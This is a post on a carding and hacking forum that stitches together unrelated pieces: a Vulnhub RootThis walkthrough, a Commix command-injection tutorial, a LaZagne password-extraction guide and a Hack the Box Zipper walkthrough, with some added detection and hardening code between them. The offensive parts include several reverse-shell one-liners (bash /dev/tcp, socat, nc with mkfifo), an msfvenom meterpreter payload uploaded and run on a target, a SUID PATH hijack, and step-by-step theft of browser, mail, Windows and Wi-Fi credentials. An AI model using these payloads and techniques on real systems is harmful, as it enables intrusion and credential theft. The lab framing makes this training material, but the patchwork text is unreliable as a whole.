Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc
[Guide] How to Vulnhub: RootThis: 1 Walkthrough - Printable Version


[Guide] How to Vulnhub: RootThis: 1 Walkthrough - NINZA - 05-14-2020

Hello friends! Today we are going to take another boot2root challenge known as RootThis. The credit for making this VM goes to “Fred Wemeijer”, and as in other boot2root challenges our goal is to get root access to complete it. You can download this VM [To see content please register here].

Security Level: Intermediate
Flags: There is one flag (flag.txt).
Penetrating Methodology:
  • IP Discovery using netdiscover
  • Network scanning (Nmap)
  • Surfing HTTP service port (80)
  • Directory enumeration using dirb
  • Getting Backup file using wget
  • Cracking password using fcrackzip
  • Cracking Hashes using John the Ripper
  • Getting Reverse Shell
  • Getting a proper TTY shell using socat
  • Cracking root password using sucrack
  • Retrieving flag
Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover

[Image: 1.png?w=687&ssl=1]
We found our target –> 192.168.1.135
Our next step is to scan our target with nmap.
nmap -p- -A 192.168.1.135

[Image: 2.png?w=687&ssl=1]
The Nmap output shows us that only one port is open: 80 (HTTP).
Since port 80 is running HTTP, we open the IP in our browser.
[Image: 3.png?w=687&ssl=1]
We don’t find anything on the webpage, so we use dirb to enumerate the directories on the web server.
dirb [To see content please register here]
[Image: 4.png?w=687&ssl=1]
We find two interesting directories called “backup” and “drupal”. We open the “/drupal” directory and find a Drupal CMS login page. We are unable to login or find any vulnerability on the CMS.
[Image: 5.png?w=687&ssl=1]
We try to open the “backup/” directory and find that it is a file, so we use “wget” to download it to our system. After downloading it, we find that it is a ZIP file. When we try to extract it we are prompted for a password. To brute-force the password-protected file we can use a tool called “fcrackzip”. After getting the password for the ZIP file we extract it and find an SQL file.
wget [To see content please register here]
file backup
fcrackzip -D -v -u -p /usr/share/wordlists/rockyou.txt backup
unzip backup
cat dump.sql
[Image: 6.png?w=687&ssl=1]
Searching through the content of the SQL file, we find 2 usernames and their password hashes.
[Image: 7.png?w=687&ssl=1]
We save the hashes in a file and then use john the ripper to crack the hashes. We are successfully able to crack the hash and get the password for the user “webman”.
john hashes --wordlist=/usr/share/wordlists/rockyou.txt

[Image: 8.png?w=687&ssl=1]
We use the credentials “webman:moranguita” to log in to the Drupal CMS, and the login succeeds.
[Image: 9.png?w=687&ssl=1]
To get a reverse shell on the target system, we go to “add content” and add the following PHP code:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.107/1234 0>&1'");

[Image: 11.png?w=687&ssl=1]
We set up our listener, and as soon as we click save on the CMS we get a reverse shell. Enumerating the target system, inside the “/home/user” directory we find a file called “MessageToRoot.txt”. We open the file and find a hint that the root password is within the first 300 words of rockyou.txt. We try the “su” command and find that we don’t have a proper TTY shell to run it.
[Image: 12.png?w=687&ssl=1]
We tried multiple ways to get a TTY shell, but were unable to spawn one with the applications available on the target machine. So we upload socat to the target machine to get a TTY shell. (Download socat from [To see content please register here].)
wget [To see content please register here]
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.107:4567

[Image: 13.png?w=687&ssl=1]
We start a listener on our local system and get a reverse shell. Running the “su” command confirms that we now have a proper TTY shell.
[Image: 14.png?w=687&ssl=1]
Now we create a dictionary with the first 300 words of rockyou.txt.
head -n 300 /usr/share/wordlists/rockyou.txt > dict.txt

[Image: 15.1.png?w=687&ssl=1]
Now, as there is no SSH service on the target (only port 80 is open), we cannot brute-force the username and password remotely. Instead, we can use a tool called “sucrack” that brute-forces the password locally through “su”. We download it to our system and extract it. Then we compile the application on our system, as there is no C compiler on the target machine. After compiling, we archive the compiled application to upload it to the target machine. (You can find more information about sucrack and download it from [To see content please register here].)
tar -xvf sucrack-1.2.3.tar.gz
cd sucrack-1.2.3/
./configure
make
tar -cvf sucrack.tar sucrack-1.2.3/

[Image: 15.png?w=687&ssl=1]
We upload the dictionary file and the compiled application to the target system. We first start a Python HTTP server using the “SimpleHTTPServer” module and then use the “wget” command on the target machine to download them from our local system. After downloading both files we extract the tar file.
wget [To see content please register here]
tar xvf sucrack.tar

[Image: 16.png?w=687&ssl=1]
After extracting the tar file, we go to the “sucrack-1.2.3/src” directory, as the compiled binary is inside it, and run the command to brute-force the password. The application successfully brute-forces the root password. We switch to the root user, and inside the /root directory we find the flag.
./sucrack -u root -w 10 /tmp/dict.txt

[Image: 17.png?w=687&ssl=1]
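Added example, not part of the original walkthrough: a detector for the sucrack pattern in auth.log, assuming Debian-style su logging and using constructed log lines (the host name, PIDs and user names are made up).

```python
"""Detect local su brute-forcing (the sucrack pattern) in auth.log.

Every sucrack run is a burst of su attempts, and su logs each failed one
itself, so the defender's signal is many "FAILED SU" lines for the same
actor/target pair inside a short window, optionally followed by a
"Successful su". The log excerpt below is constructed for this example.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Line formats emitted by su on Debian-style systems (shadow/util-linux).
FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ su\[\d+\]: "
    r"FAILED SU \(to (?P<target>\S+)\) (?P<actor>\S+) on (?P<tty>\S+)"
)
SUCCESS_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ su\[\d+\]: "
    r"Successful su for (?P<target>\S+) by (?P<actor>\S+)"
)

# Constructed sample: a guessing burst by "user" that ends in success,
# then one ordinary failed attempt by "bob" followed by a normal login.
SAMPLE_AUTH_LOG = """\
Jun 10 14:02:01 rootthis su[1201]: FAILED SU (to root) user on /dev/pts/0
Jun 10 14:02:01 rootthis su[1202]: FAILED SU (to root) user on /dev/pts/0
Jun 10 14:02:02 rootthis su[1203]: FAILED SU (to root) user on /dev/pts/0
Jun 10 14:02:02 rootthis su[1204]: FAILED SU (to root) user on /dev/pts/0
Jun 10 14:02:03 rootthis su[1205]: FAILED SU (to root) user on /dev/pts/0
Jun 10 14:02:03 rootthis su[1206]: FAILED SU (to root) user on /dev/pts/0
Jun 10 14:02:04 rootthis su[1207]: Successful su for root by user
Jun 10 14:30:11 rootthis su[1301]: FAILED SU (to root) bob on /dev/pts/1
Jun 10 14:30:20 rootthis su[1302]: Successful su for root by bob
"""


def parse_syslog_ts(text: str, year: int = 2020) -> datetime:
    """Syslog timestamps carry no year; assume one so deltas can be computed."""
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")


def detect_su_bruteforce(lines, threshold: int = 5, window_seconds: int = 60):
    """Return alerts for (actor, target) pairs with >= threshold failed su
    attempts inside window_seconds, and for any later success by such a pair."""
    recent = defaultdict(deque)   # (actor, target) -> timestamps of failures
    flagged = set()
    alerts = []
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            key = (m["actor"], m["target"])
            ts = parse_syslog_ts(m["ts"])
            q = recent[key]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()           # drop failures that fell out of the window
            if len(q) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append({"event": "su_bruteforce", "actor": key[0],
                               "target": key[1], "failures": len(q),
                               "first": q[0], "last": ts})
            continue
        m = SUCCESS_RE.match(line)
        if m and (m["actor"], m["target"]) in flagged:
            # The case that matters most: the guessing run ended in a login.
            alerts.append({"event": "su_success_after_bruteforce",
                           "actor": m["actor"], "target": m["target"],
                           "at": parse_syslog_ts(m["ts"])})
    return alerts


def analyze_sample():
    """Run the detector over the constructed log excerpt."""
    return detect_su_bruteforce(SAMPLE_AUTH_LOG.splitlines())


if __name__ == "__main__":
    for alert in analyze_sample():
        print(alert)
```

On the mitigation side, restricting su to a wheel group with pam_wheel and adding pam_faildelay make local guessing of this kind far slower.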

In this article, we learn how to use Commix from scratch by using all the basic commands and going all the way to the advanced ones.
Table of Content
  • Introduction to command injection
  • Introduction to Commix
  • Working of Commix
  • Types of Command Injection in Commix
  • Requirements
Introduction to Command Injection
Command injection is also known as shell injection or OS injection, and it is one of the OWASP Top 10 vulnerabilities. It is an attack in which arbitrary commands of the host OS are executed through a vulnerable application. Such an attack is possible when a web application sends unsafe user data to the system shell. This user data can arrive in any form: forms, cookies, HTTP headers, etc. Mostly, command injection vulnerabilities arise from insufficient input validation. In this attack, the default functionality of the application is extended by an attacker who executes system commands by injecting them, which makes it different from code injection.
Command injection was accidentally discovered in 1997 by a programmer in Norway; the accident led to the deletion of a site's web pages. SQL command injection is the most popular form of command injection: through this attack, an attacker adds SQL code to an input box in order to gain access. Web applications are the necessary vehicle for such attacks, as we communicate with the underlying OS via them.
Introduction to Commix
Commix is an automated tool for exploiting command injection vulnerabilities in web applications. It is written in Python, which means it is compatible with Linux, Windows and macOS. It comes pre-installed in Kali Linux, BlackArch and Parrot OS. This tool makes it very easy to find vulnerabilities related to command injection and then further exploit them. The user-friendliness of commix makes it very convenient for everyone, such as web developers, pen testers or security researchers, to use it.
It provides the user with a lot of options, including the ability to specify the parameters needed to connect to the host, enumeration of the victim, accessing files and modifying them, along with an offline mode. Hence, it is a pretty useful asset for exploiting command injection vulnerabilities.
Working of Commix
Commix has various command options which you can use to find and connect to the target application. Some of these options target the URL via data strings, HTTP headers, cookies and authentication parameters. There are various enumeration options too. Commix supports two command injection techniques, i.e. the result-based technique and the blind technique. Result-based command injection is the one where command output is reflected back to the attacker in the web application, whereas the blind technique is used when the response is not reflected in the web application.
Types of Command Injection in Commix
Result based command injection
This type of injection attack lets you deduce the result of the injected command from the output of the web application. It is further divided into two categories:
  • Classic result-based injection: this is the most commonly used type of command injection and the simplest of all. Several common operators are used which either chain the injected commands to the genuine ones or discard the initial command altogether and execute only the injected ones. It further divides into 3 categories, i.e. Shellshock, ICMP exfiltration and DNS exfiltration.
  • Eval-based technique: this technique is used where the targeted web application is vulnerable through the eval() function, which executes the code passed to it at run time.
Blind Command Injection
The main difference between the two types is how the data is retrieved after the injected shell command executes. When the web application gives no result back to the attacker, blind command injection is used. There are two types of blind command injection:
  • Time-based technique: this technique delays the execution of the injected command. By checking how long the application takes to respond, the attacker can determine whether the command executed successfully or not.
  • File-based technique: if you are not able to determine the result from the web application's reaction, this technique comes in handy, as it writes the output of the injected commands to a file accessible to the attacker. Otherwise it works like the result-based technique.
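As an added illustration (not from the original article) of the vulnerability commix targets, the Python code below shows the weak "ping a host" pattern beside its hardened form, plus a detection heuristic for the shell operators and time-delay primitives described above; the function names and the sample inputs are my own.

```python
"""Command injection: the weak pattern beside its hardened form.

Models the "ping a host" form that the DVWA and PentesterLab targets
expose: the application shells out to ping with a user-supplied host.
The vulnerable builder only returns the string it would hand to the
shell, so the defect can be inspected without executing anything.
"""
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels, alphanumerics and inner hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
# Operators that let injected text alter the command line (the classic
# result-based technique) ...
SHELL_META_RE = re.compile(r"[;&|`$<>()\n\r]")
# ... and the delay primitives behind the time-based (blind) technique.
TIME_DELAY_RE = re.compile(r"\b(?:sleep|timeout)\s+\d+|ping\s+-[nc]\s+\d+", re.I)


def vulnerable_command(host: str) -> str:
    """The weak pattern: raw input concatenated into a shell command line.
    Passed to os.system() or subprocess with shell=True, an input such as
    '127.0.0.1; id' runs id as well as ping."""
    return "ping -c 1 " + host


def validate_host(host: str) -> str:
    """Allow-list validation: accept an IP literal or a well-formed hostname
    and reject everything else (including values starting with '-')."""
    host = host.strip()
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"rejected host value: {host!r}")


def hardened_argv(host: str) -> list:
    """Hardened form: the validated value placed in an argv list. With no
    shell involved there is nothing to interpret ';', '&&', '$(...)' or a
    newline, and validation rejects them anyway."""
    return ["ping", "-c", "1", validate_host(host)]


def run_ping(host: str, timeout: float = 5.0) -> subprocess.CompletedProcess:
    """Execute the hardened command (shell=False is the default)."""
    return subprocess.run(hardened_argv(host), capture_output=True,
                          text=True, timeout=timeout, check=False)


def looks_like_injection(value: str) -> bool:
    """Detection heuristic for request logs or a WAF rule: shell operators
    or a sleep/ping delay inside a field that should hold only a host."""
    return bool(SHELL_META_RE.search(value) or TIME_DELAY_RE.search(value))
```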
Requirements
  • DVWA
  • PentestLab
  • Kali Linux
  • Commix Tool
Some of the practicals we will do on PentesterLab for Linux and others on DVWA for Windows. Let’s start with the practical use of commix. First, we use the help option to check all the options we can use to exploit a target via commix.
commix -h

[Image: 1.png?w=687&ssl=1]
Now let’s try and get a commix session using the URL. For this, use a URL that is vulnerable to command injection; here we will use PentesterLab’s URL as shown in the image below:
[Image: 2.png?w=687&ssl=1]
Use the following command to get a commix session through the URL:
commix -u <URL>
And so, with this command you get a commix (os_shell) as shown in the image below:
[Image: 3.png?w=687&ssl=1]
Now, let’s use the batch command to have the commix session by default and for this use the following command :
commix -u <URL> --batch

[Image: 4.png?w=687&ssl=1]
Now, as you can see in the above image, we have directly entered the session by default. Now, to get all the basic information about the target use the following command :
commix -u <URL> --all

[Image: 5.png?w=687&ssl=1]
As shown in the image above, using the above command will give you all the basic information about the target. Next, with the help of the following command we can know the current user of target :
commix -u <URL> --current-user

[Image: 6.png?w=687&ssl=1]
As a result of the above command, you can see in the image above that the current user is www-data. Now, we can also find out the hostname by using the following command:
commix -u <URL> --hostname

[Image: 7.png?w=687&ssl=1]
Hence, the host is Debian. Now, the question is how we can determine whether our target is root or not. For this, we have the following command:
commix -u <URL> --is-root

[Image: 8.png?w=687&ssl=1]
This way we found that our target is not root. Use the following command to get information about the system:
commix -u <URL> --sys-info

[Image: 9.png?w=687&ssl=1]
Upon executing the above command, we now have the system information. To have information about users, use the following command :
commix -u <URL> --users

[Image: 11.png?w=687&ssl=1]
And this way, we have a list of all the users. The next command is used to find out whether the current user is an admin of the system:
commix -u <URL> --is-admin

[Image: 12.png?w=687&ssl=1]
And again you can see that the target user is not an admin. Now, to read the contents of a desired file, we can use the following command:
commix -u <URL> --file-read=/etc/passwd

[Image: 13.png?w=687&ssl=1]
And the results of the above command are shown in the image above. Our next practicals are performed on DVWA (Windows environment).
[Image: 14.png?w=687&ssl=1]
Captured the cookies of the submitted request using BurpSuite.
[Image: 15.png?w=687&ssl=1]
Now, we use the content of the cookie to validate our session using the parameters --cookie and --data. These two parameters send the data string in order to exploit the POST method and validate our session at the same time. For this, use the following command:
commix -u <URL> --cookie="security=low; PHPSESSID=2r9avccki91i3uq2eqlud8sg08" --data="ip=127.0.0.1&Submit=Submit"

[Image: 16.png?w=687&ssl=1]
With the help of the above command, we directly get a session as shown in the image above. Now, we will create a malware file using msfvenom. Type the following command to generate it:
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.100 lport=1234 -f raw > venom.py

[Image: 18.png?w=687&ssl=1]
Now, we will use the above file and upload it in our target by using the following command :
commix -u <URL> --cookie="PHPSESSID=4029asg19ejeuibfq30d7lc1o8; security=low" --data="ip=127.0.0.1&Submit=Submit" --file-write="/root/venom.py" --file-dest="/tmp/venom.py" --os-cmd="python /tmp/venom.py"

[Image: 19.png?w=687&ssl=1]
Now, the above command will upload and run our malware in the target machine. You can use multi/handler to get a session and for this use the following set of commands :
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set lhost eth0
set lport 1234
run

[Image: 20.png?w=687&ssl=1]
And this way, as shown in the image, you will have a meterpreter session. This is how you can use commix, a third party automated tool, to your advantage.

This article will be focused on The LaZagne project and its usage in Post Exploitation.
Table of Content:
  • Introduction of LaZagne Project
  • Syntax and Parameters
  • Achieve Meterpreter and Upload LaZagne
  • Help Screen
  • Mails Argument
  • Windows Argument
  • Browsers Argument
  • Databases Argument
  • Wi-Fi Argument
  • All Argument
  • oN Parameter
  • Verbose Mode Parameter
  • Quiet Parameter
Introduction of LaZagne Project
LaZagne is an open source application that retrieves passwords stored on a system. It injects Python code directly into memory without writing anything to disk, which makes it difficult to trace. Usually, when we get a session on a target system, our main aim is to gather credentials. When an attacker attacks a target, there are two ways through which the target can be compromised. If the attacker only gets a meterpreter session, then all that is compromised is the device's security.
But using some scripts and post-exploitation modules, the attacker can compromise every nook of the victim's security. This includes email passwords, social networking passwords, SSH passwords, banking information, etc. Usually, extracting passwords is a noisy and clumsy task, but with LaZagne it is very simple and stealthy.
Without LaZagne, attackers normally run a bunch of different scripts targeting the different applications installed on the target system. LaZagne does this automatically: it first checks which applications are installed on the target system and then runs the specific script targeting the passwords of each application.
Famous Scripts Included in LaZagne
  • KeeThief
  • mimipy
  • mimikatz
  • pypykatz
  • creddump
  • chainbreaker
  • pyaes
  • pyDes
  • secretstorage and many more.
Target Software
  • Firefox
  • Google Chrome
  • Opera
  • Skype
  • Postgresql
  • Thunderbird
  • Keepass
  • CoreFTP
  • FileZilla and many more.
Syntax and Parameters
On Linux systems, LaZagne is executed as a Python file, but when our target is Windows we have to use the executable (exe) file. We can download the executables from [To see content please register here].

[Image: 0.png?w=687&ssl=1]
LaZagne has a lot of other parameters and conditions, but here we have used only certain parameters and targets due to technological limitations.
Achieve Meterpreter and Upload LaZagne
Open a Kali Linux terminal and type msfconsole to load the Metasploit framework. Now we need to compromise the victim’s machine to achieve a session, either meterpreter or shell; to do so you can read our previous article at [To see content please register here].

After getting meterpreter on the remote system, we need to upload the executable file to the target machine to extract credentials. We will use upload command for this.
upload lazagne.exe .

[Image: 1.png?w=687&ssl=1]
Now that we have the LaZagne on the target system, it’s time to enumerate passwords.
Use shell command on the meterpreter shell to get to the command line on the target system.
Help Screen
To get details about the LaZagne we will use the -h parameter. This will print the list of parameters and arguments with the working examples on our screen. This is an informative banner as it not only gives us various methods that we can use but it also tells us how to use those parameters.
lazagne.exe -h

[Image: 2.png?w=687&ssl=1]
Mails Argument
This argument targets mail clients like Mozilla Thunderbird and Microsoft Outlook. When this argument is selected, a script runs in the background which extracts the login credentials stored by these email clients. As we can see in the given image, it has successfully extracted the credentials that were stored in the email clients.
lazagne.exe mails

[Image: 3.png?w=687&ssl=1]
Windows Argument
This argument targets Windows security on all fronts. When this argument is selected, a script runs in the background which includes autologon, cachedump, credman, hashdump, lsa_secrets and others. This compromises all of the Windows defenses and gives the attacker the credentials he is craving for. As we can see in the given image, it has successfully extracted the credentials.
lazagne.exe windows

[Image: 4.png?w=687&ssl=1]
Browsers Argument
This argument targets browsers like Mozilla Firefox, Google Chrome, Opera, UC Browser, Microsoft Edge and more. When this argument is selected, a script runs in the background which extracts the login credentials stored inside the browsers. Browsers hide the passwords and show them only after verifying the Windows credentials, so in order to extract the credentials stored inside the browser, LaZagne attacks the SAM, gets the Windows password and then uses it to extract the remaining passwords. As we can see in the given image, it has successfully extracted the credentials that were stored in Firefox and Chrome.
lazagne.exe browsers

[Image: 5.png?w=687&ssl=1]
Databases Argument
This argument targets database clients like PostgreSQL. When this argument is selected, a script runs in the background which extracts the login credentials stored by any database client. As we can see in the given image, it has successfully extracted the credentials that were stored in the PostgreSQL client.
lazagne.exe databases

[Image: 6.png?w=687&ssl=1]
Wi-Fi Argument
This argument targets the stored Wi-Fi credentials. When this argument is selected, a script runs in the background which extracts the credentials of every Wi-Fi network the user has connected to and chosen to save the password for. As we can see in the given image, it has successfully extracted the Wi-Fi credentials.
lazagne.exe wifi

[Image: 7.png?w=687&ssl=1]
All Argument
This argument runs all the modules in LaZagne. When this argument is selected, a script runs in the background which extracts all the login credentials stored on the target system. As we can see in the given image, it has successfully extracted all the possible credentials from the target.
lazagne.exe all

[Image: 8.png?w=687&ssl=1]
oN Parameter
This parameter should be run with some argument, otherwise it will give an error (we are using the all argument here). This parameter is optional. It not only prints the output on the terminal screen but also creates a file in the directory it was run from and writes the output of the script to it.
lazagne.exe all -oN

[Image: 9.png?w=687&ssl=1]
Let’s check if the file was created.  As we can see in the given image that a file named credentials is created and on opening it using the cat command it shows the same result that we saw on the terminal.
[Image: 10.png?w=687&ssl=1]
Verbose Mode Parameter
This parameter should be run with some argument, otherwise it will give an error (we are using the all argument here). This parameter is optional. By default LaZagne has 2 levels of verbosity, Level 0 and Level 1; if no parameter is given, Level 0 is selected. But when we give the -vv parameter, it increases the verbosity of the extraction and the output changes: LaZagne now forcefully runs each and every script in its arsenal and tries to extract as many credentials as it can.
lazagne.exe all -vv

[Image: 11.png?w=687&ssl=1]
Quiet Parameter
This parameter should be run with some argument, otherwise it will give an error (we are using the all argument here). This parameter is optional. It doesn’t print any output on the terminal screen: the scripts do run in the background, but there is no visibility of the passwords extracted, so we use it together with the -oN parameter we discussed earlier, which creates a file in the directory it was run from and writes the output of the script to it.
lazagne.exe all -quiet -oN

[Image: 12.png?w=687&ssl=1]

Today we are going to solve another CTF challenge, “Zipper”. It is a retired vulnerable lab presented by Hack the Box to help pentesters perform online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Hard
Task: To find user.txt and root.txt file
Note: Since these labs are available online, they have a static IP. The IP of Zipper is 10.10.10.108.
Penetrating Methodology
  • Network scanning (Nmap)
  • Surfing HTTP service port (80)
  • Directory enumeration using gobuster
  • Logging in as a Guest User
  • Enumerating for Login Credentials
  • Logging in through zabbixcli
  • Giving permissions to access GUI
  • Getting a reverse shell using zabbix exploit
  • Retrieving User flag
  • Modify the Environment PATH to run systemctl
  • Snagging the Root Flag
Walkthrough
Let’s start off with our basic Nmap command to find out the open ports and services.
nmap -A 10.10.10.108

[Image: 1.png?w=687&ssl=1]
The Nmap scan shows us that there are 2 ports open: 22 (SSH) and 80 (HTTP).
As port 80 is running the HTTP service, we access it using the web browser.
[Image: 2.png?w=687&ssl=1]
Now we run gobuster to enumerate the directories of the web service and find a directory called /zabbix.
gobuster -s '200,204,301,302,307,403,500' -e -t 20 -u [To see content please register here] -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

[Image: 3.png?w=687&ssl=1]
We open the “zabbix” directory and find a login page for Zabbix web portal.
[Image: 4.png?w=687&ssl=1]
Now we login as guest and are able to access the dashboard.
[Image: 5.png?w=687&ssl=1]
Enumerating the web application, inside “Latest data” in monitoring data we get a hint for the username as “Zapper’s Backup script”.
[Image: 6.png?w=687&ssl=1]
Now we try to log in again as user “zapper”, using the same username and password, i.e. “zapper:zapper”.
[Image: 7.png?w=687&ssl=1]
When we try to login, we get an error stating the “GUI access disabled”.
[Image: 8.png?w=687&ssl=1]
As we do not have GUI access, we use zabbix-cli to connect to the Zabbix API and check the available users. Now we can either create a user with GUI access or add an existing user to a group with GUI access. In this case, we first create a new group called hack with GUI access enabled.
zabbix-cli
show_users
create_usergroup

[Image: 10.png?w=687&ssl=1]
Now we add user “zapper” to the new group we created and remove the user from the previous group called “No access to the frontend”.
add_user_to_usergroup
remove_user_from_usergroup
show_users

[Image: 11.png?w=687&ssl=1]
Now we are successfully able to access the web portal as user “zapper”.
[Image: 15.png?w=687&ssl=1]
Searching for an exploit for the Zabbix application, we find one [To see content please register here]. It requires a username, password and hostid to run successfully. As we have access to the dashboard, we can find the hostid of a container.
[Image: 16.png?w=687&ssl=1]
Now we edit the exploit according to the target application.
[Image: 17.png?w=687&ssl=1]
We run the exploit and are able to get a shell. Now, to get a reverse shell, we set up our listener using netcat and run the bash one-liner.
python exploit.py
whoami
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 1234 > /tmp/f

[Image: 18.png?w=687&ssl=1]
Now when we check our listener, we find that we have a reverse shell. When we try to spawn a TTY shell using python, we find that the system contains neither python nor python3, so we start an interactive bash shell instead.
python -c "import pty;pty.spawn('/bin/bash')"
which python
which python3
bash -i

[Image: 19.png?w=687&ssl=1]
Enumerating the system, we find that we are inside a Docker container and are unable to find any way to escape it. If we take a look at the Zabbix documentation, we find there is an option called “execute_on”. To execute inside the container we have to set this option to “0”, and to execute on the server we have to set it to “1”. We edit the exploit and add this option to get a reverse shell from the server.
[Image: 21.png?w=687&ssl=1]
We now run the exploit and use the bash one-liner to get a reverse shell.
python exploit.py
whoami
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 1234 > /tmp/f

[Image: 22.png?w=687&ssl=1]
We set up the listener and get a reverse shell on the server.
[Image: 25.png?w=687&ssl=1]
We change the directory to “/home/zapper” and find a file called “user.txt”. We try to open the file and find that we do not have read permissions.
[Image: 26.png?w=687&ssl=1]
We now go to the “utils” directory and find a file called “backup.sh”. We open the file and find the password for user “zapper”.
[Image: 27.png?w=687&ssl=1]
We switch user to zapper and use the password we find inside the “backup.sh” file. After we switch user, we again try to open the “user.txt” file and find the first flag.
[Image: 29.png?w=687&ssl=1]
We also find a file called “zabbix-service” with SUID bit set. We find that the program is executing “systemctl” when we check the program with strings.
[Image: 30.png?w=687&ssl=1]
Now we can modify the PATH environment variable so that the program runs our malicious “systemctl”. We create a new systemctl file that executes /bin/bash and give it executable permission. Then we prepend the directory holding our file to the PATH environment variable and run the application. As soon as we run the program we get a root shell.
echo "/bin/bash" > systemctl
chmod +x systemctl
PATH=~/:$PATH
utils/zabbix-service

[Image: 31.png?w=687&ssl=1]
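The defender's view of the PATH hijack above, as an added example that is not part of the original write-up: a Python audit that flags the PATH entries a privileged program must not trust, plus the sanitized environment a setuid helper should use instead of the caller's. The directory names and the injectable "is writable" check are assumptions for illustration.

```python
"""Audit PATH for the hijack just shown and build a safe environment.

The zabbix-service binary ran "systemctl" through the caller's PATH, so
a directory the invoking user controls (the home directory, prepended
with PATH=~/:$PATH) outranked /bin. audit_path() lists such entries;
hardened_env() is what a privileged helper should run with instead.
"""
import os
import shutil

# Directories a privileged helper should resolve commands from, in order.
TRUSTED_PATH = ("/usr/local/sbin", "/usr/local/bin", "/usr/sbin",
                "/usr/bin", "/sbin", "/bin")
# Variables that also steer what a child process does, beyond PATH.
DANGEROUS_VARS = ("IFS", "ENV", "BASH_ENV", "PYTHONPATH", "PERL5LIB")


def audit_path(path_value: str, home: str, is_writable=None) -> list:
    """Return (entry, reason) pairs for PATH entries an unprivileged caller
    could use to substitute a binary. is_writable is injectable so the
    check can run against a fake filesystem (defaults to os.access)."""
    if is_writable is None:
        is_writable = lambda d: os.access(d, os.W_OK)
    home = os.path.normpath(home)
    findings = []
    for raw in path_value.split(":"):
        if raw in ("", "."):
            findings.append((raw or "(empty)", "resolves to the current directory"))
        elif not os.path.isabs(raw):
            findings.append((raw, "relative entry"))
        else:
            entry = os.path.normpath(raw)
            if entry == home or entry.startswith(home + os.sep):
                findings.append((raw, "inside the caller's home directory"))
            elif is_writable(entry):
                findings.append((raw, "writable by the caller"))
    return findings


def hardened_env(base=None) -> dict:
    """Environment for a setuid/privileged helper: fixed PATH, and no LD_*
    or other interpreter-steering variables inherited from the caller."""
    source = os.environ if base is None else base
    env = {k: v for k, v in source.items()
           if not k.startswith("LD_") and k not in DANGEROUS_VARS}
    env["PATH"] = ":".join(TRUSTED_PATH)
    return env


def resolve_trusted(command: str):
    """Locate a command only through the trusted PATH. A privileged program
    should do this (or hard-code /bin/systemctl) rather than rely on the
    caller's PATH. Returns None if the command is not in a trusted dir."""
    return shutil.which(command, path=":".join(TRUSTED_PATH))


if __name__ == "__main__":
    for entry, reason in audit_path(os.environ.get("PATH", ""),
                                    os.path.expanduser("~")):
        print(f"untrusted PATH entry {entry!r}: {reason}")
```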
Now we change to /root directory and find a file called “root.txt”. We take a look at the content of the file and find our final flag.
[Image: 32.png?w=687&ssl=1]